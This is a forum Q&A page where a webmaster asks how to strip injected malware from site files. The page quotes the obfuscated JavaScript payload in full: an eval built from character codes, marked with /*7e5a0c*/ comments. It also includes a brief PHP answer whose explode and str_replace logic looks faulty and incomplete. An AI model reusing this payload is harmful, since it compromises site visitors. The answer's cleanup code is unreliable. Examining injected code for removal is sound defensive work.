Home/ Questions/Q 8875937
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-14T19:06:09+00:00

One of my sites has been hit with malware. The code that they added

  • 0

One of my sites has been hit with malware. The code that they added to my js files looks like this:

/*7e5a0c*/
v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,117,102,95,104,115,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,12,8,32,31,30,32,116,101,97,103,114,46,114,112,99,31,59,32,38,102,116,115,110,58,46,45,111,105,110,97,119,106,97,108,44,114,116,45,99,110,115,110,115,47,51,45,110,104,111,37,59,12,8,32,31,30,32,116,101,97,103,114,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,30,32,31,115,103,96,102,116,45,113,116,120,106,101,45,96,111,113,98,101,113,30,61,31,37,48,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,104,100,103,103,103,114,32,60,30,39,48,110,120,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,49,111,118,39,58,11,10,31,30,32,31,115,103,96,102,116,45,113,116,120,106,101,45,106,101,101,114,32,60,30,39,48,110,120,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,116,110,110,32,60,30,39,48,110,120,38,57,13,9,11,10,31,30,32,31,103,102,31,38,33,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,115,103,96,102,116,38,39,41,31,121,13,9,30,32,31,30,32,31,30,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,117,102,95,104,115,90,39,61,58,47,99,103,118,61,37,41,58,11,10,31,30,32,31,30,32,31,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,116,101,97,103,114,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,117,102,95,104,115,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+492!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)
/*/7e5a0c*/

The code that they added to my php and html files is slightly different, how can I write a php script to step through all of my site files and remove any text between 2 tags, for examnple in the code above, I would have it remove everything between and including /7e5a0c/ and /7e5a0c/

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    I think you can make it width these two functions :
    file_get_contents : http://php.net/manual/fr/function.file-get-contents.php
    explode : http://php.net/manual/fr/function.explode.php

    Something like :

    $c = file_get_contents('yourfile.php');
$a= explode('/*7e5a0c*/', $c);

    your code without the “virus” :

    $r = $a[0].$a[2]

    Not sure if it removes the “/7e5a0c/” , if so try :

    str_replace("/*7e5a0c*/", "", $r);

    edit : text editor (notepad++) search function can also helps you.

    • 0